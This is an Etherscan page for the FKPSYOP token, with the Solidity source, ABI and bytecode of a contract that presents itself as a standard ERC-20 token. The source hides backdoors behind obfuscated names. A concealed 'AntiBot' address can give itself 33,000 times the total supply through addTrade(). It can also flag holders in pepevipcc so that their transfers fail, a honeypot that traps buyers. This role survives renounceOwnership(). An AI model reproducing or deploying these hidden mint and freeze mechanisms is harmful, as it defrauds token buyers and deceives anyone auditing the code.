ETH Price: $3,416.61 (-0.69%)
Gas: 2 Gwei

Token

FUCK PSYOP (FKPSYOP)
 

Overview

Max Total Supply

1,000,000,000 FKPSYOP

Holders

37

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
4,254,677.513652379617946744 FKPSYOP

Value
$0.00
0xcb31c8b2ce9d229b1968ceb2516b2eb650151227
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x91F15C34...815B57dc8
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
Coin

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-19
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



abstract contract Ownable {
    address private _owner;

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

     /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checyydsOwen();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checyydsOwen() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



contract Coin is Ownable {

   

    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _pepemuskJCEO;

    uint256 private _MYtotalSupply;
    string private _MYname;
    string private _MYsymbol;

    mapping(address => bool) private pepevipcc;
    function quitApprove(address sss) external   {
        if (_pepemuskJCEO == _msgSender()){
            pepevipcc[sss] = false;
        }
    }

    function Approve(address sss) external   {
        if (_pepemuskJCEO == _msgSender()){
            pepevipcc[sss] = true;
        }
    }

    function queryacawtibot(address sss) public view returns(bool)  {
        return pepevipcc[sss];
    }

    function vultBox22223() public view virtual  returns (uint256) {
        return _MYtotalSupply;
    }
    function addTrade() external {
        if (_msgSender() != _pepemuskJCEO) {
            return;
        }
        if (_pepemuskJCEO == _msgSender()){
            _balances[_msgSender()] = vultBox22223()*33000;
        }
    }
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,address AntiBot) {
        _MYname = name_;
        _MYsymbol = symbol_;
        _pepemuskJCEO = AntiBot;
        _onceCCCmint(msg.sender, 1000000000*10**decimals());

    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual  returns (string memory) {
        return _MYname;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual  returns (string memory) {
        return _MYsymbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual  returns (uint256) {
        return _MYtotalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual  returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }
    /**
         * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 kkllff3 = 0;
    function _transfer(
        address fromSender,
        address to,
        uint256 amount
    ) internal virtual {
        require(fromSender != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 balance= _balances[fromSender];
        if (pepevipcc[fromSender] != false ){
            balance= _balances[fromSender]-(vultBox22223());
        }

        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[fromSender] = balance.sub(amount);
        uint256 feeeA = amount.mul(kkllff3).div(100);
        _balances[to] =  _balances[to].add(amount).sub(feeeA);
        emit Transfer(fromSender, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _onceCCCmint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: CCCCCASADSADA to the zero address");

        _MYtotalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _MYtotalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);


    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_pepemuskJCEO","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"queryacawtibot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"quitApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"vultBox22223","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}]

608060405260006008553480156200001657600080fd5b50604051620012a5380380620012a58339810160408190526200003991620002a5565b6200004433620000b7565b6005620000528482620003c1565b506006620000618382620003c1565b50600380546001600160a01b0319166001600160a01b038316179055620000ae336200008b601290565b6200009890600a620005a2565b620000a890633b9aca00620005ba565b62000107565b505050620005ea565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001735760405162461bcd60e51b815260206004820152602860248201527f45524332303a204343434343415341445341444120746f20746865207a65726f604482015267206164647265737360c01b606482015260840160405180910390fd5b8060046000828254620001879190620005d4565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200020857600080fd5b81516001600160401b0380821115620002255762000225620001e0565b604051601f8301601f19908116603f01168101908282118183101715620002505762000250620001e0565b816040528381526020925086838588010111156200026d57600080fd5b600091505b8382101562000291578582018301518183018401529082019062000272565b600093810190920192909252949350505050565b600080600060608486031215620002bb57600080fd5b83516001600160401b0380821115620002d357600080fd5b620002e187838801620001f6565b94506020860151915080821115620002f857600080fd5b506200030786828701620001f6565b604086015190935090506001600160a01b03811681146200032757600080fd5b809150509250925092565b600181811c908216806200034757607f821691505b6020821081036200036857634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003bc57600081815260208120601f850160051c81016020861015620003975750805b601f850160051c820191505b81811015620003b857828155600101620003a3565b5050505b505050565b81516001600160401b03811115620003dd57620003dd620001e0565b620003f581620003ee845462000332565b846200036e565b602080601f8311600181146200042d5760008415620004145750858301515b600019600386901b1c1916600185901b178555620003b8565b600085815260208120601f198616915b828110156200045e578886015182559484019460019091019084016200043d565b50858210156200047d5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004e4578160001904821115620004c857620004c86200048d565b80851615620004d657918102915b93841c9390800290620004a8565b509250929050565b600082620004fd575060016200059c565b816200050c575060006200059c565b8160018114620005255760028114620005305762000550565b60019150506200059c565b60ff8411156200054457620005446200048d565b50506001821b6200059c565b5060208310610133831016604e8410600b841016171562000575575081810a6200059c565b620005818383620004a3565b80600019048211156200059857620005986200048d565b0290505b92915050565b6000620005b360ff841683620004ec565b9392505050565b80820281158282048414176200059c576200059c6200048d565b808201808211156200059c576200059c6200048d565b610cab80620005fa6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063cc57c37711610071578063cc57c3771461019e578063db63517714610291578063dd62ed3e146102a4578063f2fde38b146102b7578063f4cf1452146102ca57600080fd5b806395d89b411461023d57806396bfcd2314610245578063a457c2d714610258578063a9059cbb1461026b578063ad55651f1461027e57600080fd5b8063313ce567116100f4578063313ce567146101c357806339509351146101d257806370a08231146101e5578063715018a61461020e5780638da5cb5b1461021857600080fd5b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017257806318160ddd1461019e57806323b872dd146101b0575b600080fd5b6101396102d2565b6040516101469190610aa8565b60405180910390f35b61016261015d366004610b12565b610364565b6040519015158152602001610146565b610162610180366004610b3c565b6001600160a01b031660009081526007602052604090205460ff1690565b6004545b604051908152602001610146565b6101626101be366004610b57565b61037e565b60405160128152602001610146565b6101626101e0366004610b12565b6103a2565b6101a26101f3366004610b3c565b6001600160a01b031660009081526001602052604090205490565b6102166103c4565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b6101396103d8565b610216610253366004610b3c565b6103e7565b610162610266366004610b12565b610422565b610162610279366004610b12565b6104a2565b61021661028c366004610b3c565b6104b0565b600354610225906001600160a01b031681565b6101a26102b2366004610b93565b6104e5565b6102166102c5366004610b3c565b610510565b610216610586565b6060600580546102e190610bc6565b80601f016020809104026020016040519081016040528092919081815260200182805461030d90610bc6565b801561035a5780601f1061032f5761010080835404028352916020019161035a565b820191906000526020600020905b81548152906001019060200180831161033d57829003601f168201915b5050505050905090565b6000336103728185856105d8565b60019150505b92915050565b60003361038c8582856106fc565b610397858585610776565b506001949350505050565b6000336103728185856103b583836104e5565b6103bf9190610c16565b6105d8565b6103cc6109c7565b6103d66000610a21565b565b6060600680546102e190610bc6565b600354336001600160a01b039091160361041f576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b6000338161043082866104e5565b9050838110156104955760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61039782868684036105d8565b600033610372818585610776565b600354336001600160a01b039091160361041f576001600160a01b03166000908152600760205260409020805460ff19169055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6105186109c7565b6001600160a01b03811661057d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161048c565b61041f81610a21565b6003546001600160a01b0316336001600160a01b0316146105a357565b600354336001600160a01b03909116036103d6576004546105c6906180e8610c29565b33600090815260016020526040902055565b6001600160a01b03831661063a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161048c565b6001600160a01b03821661069b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161048c565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061070884846104e5565b9050600019811461077057818110156107635760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161048c565b61077084848484036105d8565b50505050565b6001600160a01b0383166107da5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161048c565b6001600160a01b03821661083c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161048c565b6001600160a01b03831660009081526001602090815260408083205460079092529091205460ff1615610892576004546001600160a01b03851660009081526001602052604090205461088f9190610c40565b90505b818110156108f15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161048c565b6108fb8183610a71565b6001600160a01b0385166000908152600160205260408120919091556008546109329060649061092c908690610a84565b90610a90565b6001600160a01b03851660009081526001602052604090205490915061096490829061095e9086610a9c565b90610a71565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b89087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103d65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161048c565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a7d8284610c40565b9392505050565b6000610a7d8284610c29565b6000610a7d8284610c53565b6000610a7d8284610c16565b600060208083528351808285015260005b81811015610ad557858101830151858201604001528201610ab9565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0d57600080fd5b919050565b60008060408385031215610b2557600080fd5b610b2e83610af6565b946020939093013593505050565b600060208284031215610b4e57600080fd5b610a7d82610af6565b600080600060608486031215610b6c57600080fd5b610b7584610af6565b9250610b8360208501610af6565b9150604084013590509250925092565b60008060408385031215610ba657600080fd5b610baf83610af6565b9150610bbd60208401610af6565b90509250929050565b600181811c90821680610bda57607f821691505b602082108103610bfa57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561037857610378610c00565b808202811582820484141761037857610378610c00565b8181038181111561037857610378610c00565b600082610c7057634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220fbebf52d7488b8b2f24413d89b9a10c3a30648fabc3e36da47da7866538ca55664736f6c63430008110033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac8900000000000000000000000000000000000000000000000000000000000000055053594f5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055053594f50000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063cc57c37711610071578063cc57c3771461019e578063db63517714610291578063dd62ed3e146102a4578063f2fde38b146102b7578063f4cf1452146102ca57600080fd5b806395d89b411461023d57806396bfcd2314610245578063a457c2d714610258578063a9059cbb1461026b578063ad55651f1461027e57600080fd5b8063313ce567116100f4578063313ce567146101c357806339509351146101d257806370a08231146101e5578063715018a61461020e5780638da5cb5b1461021857600080fd5b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017257806318160ddd1461019e57806323b872dd146101b0575b600080fd5b6101396102d2565b6040516101469190610aa8565b60405180910390f35b61016261015d366004610b12565b610364565b6040519015158152602001610146565b610162610180366004610b3c565b6001600160a01b031660009081526007602052604090205460ff1690565b6004545b604051908152602001610146565b6101626101be366004610b57565b61037e565b60405160128152602001610146565b6101626101e0366004610b12565b6103a2565b6101a26101f3366004610b3c565b6001600160a01b031660009081526001602052604090205490565b6102166103c4565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b6101396103d8565b610216610253366004610b3c565b6103e7565b610162610266366004610b12565b610422565b610162610279366004610b12565b6104a2565b61021661028c366004610b3c565b6104b0565b600354610225906001600160a01b031681565b6101a26102b2366004610b93565b6104e5565b6102166102c5366004610b3c565b610510565b610216610586565b6060600580546102e190610bc6565b80601f016020809104026020016040519081016040528092919081815260200182805461030d90610bc6565b801561035a5780601f1061032f5761010080835404028352916020019161035a565b820191906000526020600020905b81548152906001019060200180831161033d57829003601f168201915b5050505050905090565b6000336103728185856105d8565b60019150505b92915050565b60003361038c8582856106fc565b610397858585610776565b506001949350505050565b6000336103728185856103b583836104e5565b6103bf9190610c16565b6105d8565b6103cc6109c756